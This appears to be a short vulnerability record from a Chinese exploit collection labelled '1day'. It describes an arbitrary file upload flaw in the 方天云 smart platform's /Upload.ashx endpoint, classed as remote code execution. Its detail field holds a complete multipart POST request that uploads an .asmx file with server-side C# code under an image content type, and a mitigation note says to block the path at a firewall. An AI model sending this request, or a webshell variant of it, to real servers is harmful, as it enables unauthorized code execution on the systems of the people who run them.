vendor = "方天云"
name = "方天云智慧平台系统 Upload.ashx 任意文件上传漏洞"
type = "RCE"
version = "未知"
path = "/Upload.ashx"
detail = "POST /Upload.ashx HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX Connection: close Content-Length: 232 ------WebKitFormBoundarySl8siBbmVicABvTX Content-Disposition: form-data; name=\"file\"; filename=\"test.asmx\" Content-Type: image/jpeg <%@Page Language=\"C#\"%><%Response.Write(now())%> ------WebKitFormBoundarySl8siBbmVicABvTX--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
